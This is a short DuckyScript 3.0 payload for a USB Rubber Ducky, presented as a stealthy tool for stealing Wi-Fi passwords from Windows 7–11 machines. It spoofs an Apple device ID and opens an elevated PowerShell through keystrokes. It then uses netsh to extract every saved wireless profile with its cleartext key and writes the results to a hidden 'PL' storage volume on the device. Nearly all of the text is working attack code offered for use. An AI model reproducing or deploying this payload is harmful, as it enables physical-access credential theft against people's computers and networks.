DuckyScript 3.0. made to be as stealthy as possible. Rename your Rubber Ducky in mass storage mode to be named “PL”
REM Admin PowerShell and Exfil wifi passwords via mass storage
REM Windows 7-11
REM Author: Princess Pi
REM ATTACKMODE HID STORAGE
ATTACKMODE HID STORAGE VID_05AC PID_021E MAN_USB PROD_pl SERIAL_D441
$_JITTER_ENABLED = TRUE
$_JITTER_MAX = 5
LED_R
DELAY 800
GUI x
DELAY 550
a
DELAY 550
ALT y
DELAY 750
STRINGLN $wifis = (netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}
DELAY 1000
STRINGLN $m=(Get-Volume -FileSystemLabel ‘PL’).DriveLetter
DELAY 400
STRINGLN echo $wifis >> $m’:\wifi_passwords.txt’
DELAY 550
STRINGLN exit
DELAY 300
LED_G